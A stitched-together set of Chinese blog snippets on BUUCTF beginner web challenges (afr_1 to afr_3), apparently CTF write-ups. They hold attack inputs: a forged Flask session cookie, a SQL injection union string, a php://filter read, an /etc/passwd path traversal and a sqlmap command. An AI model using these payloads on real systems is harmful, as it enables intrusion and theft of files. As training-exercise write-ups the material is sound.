1. -s 指的是加密密钥 -t 指的是加密密文(ssti) payload: .eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YM4agQ.nUmKAGlhSriciQXZZ_7z8GdRwOI 额。。。
N1BOOK afr_1 1 ---BUUCTF 看到题目说任意文件读取漏洞 1.我们看到url中get参数是hello,页面则显示hello的页面,也就是说我们要构建一个参数对应到flag的页面之后就去访问 2.看到访问flag的页面显示nonono,证明我们访问到了flag页面,但是没有flag,怀疑是被隐藏了,所以我们就试着读取flag页面的源码 3.需要知道的...
buuctf 刷题记录 [第一章 web入门]afr_3 考点:本题考查对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入 关于/proc/目录 Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊...
id=-1%27%20union%20select%201,fllllag,1%20from%20fl4g--+ [第一章 web入门]afr_1 伪协议读取 http://04e270ee-476a-49d2-8aa4-6f9e49ce90ef.node3.buuoj.cn/?p=php://filter/read=convert.base64-encode/resource=flag base64解码得到flag __EOF__...
BUUCTF[第一章 web入门]afr_3 1 考点: 1.linux系统命令 2.flask之ssti模板注入 3.sisson伪造 进入靶场: 随便输入一个值,提交查询。 发现article可点击。 name参数值可以更改,利用这个name参数获取当前执行系统命令 payload:name=../../../etc/passwd...
[第一章 web入门]afr_2 1 BUUCTF 任意文件读取漏洞 进入环境 查看 网页源码 访问一下这个目录 看到.../想到目录穿越 在url后加上img../ 下方有个flag文件,点击自动跳转下载 用记事本打开 博客说明:文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!
1 python sqlmap.py -u "http://d9928328-e53e-484b-82c4-ebb5dd9c9836.node3.buuoj.cn/login.php?tips=1" --data="name=1'&pass=password&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --dbs 虽然说懒吧,但是他跑了二十多分钟是我没想到的。 2|0[第一章 web入门]afr_3 /proc/[pid]...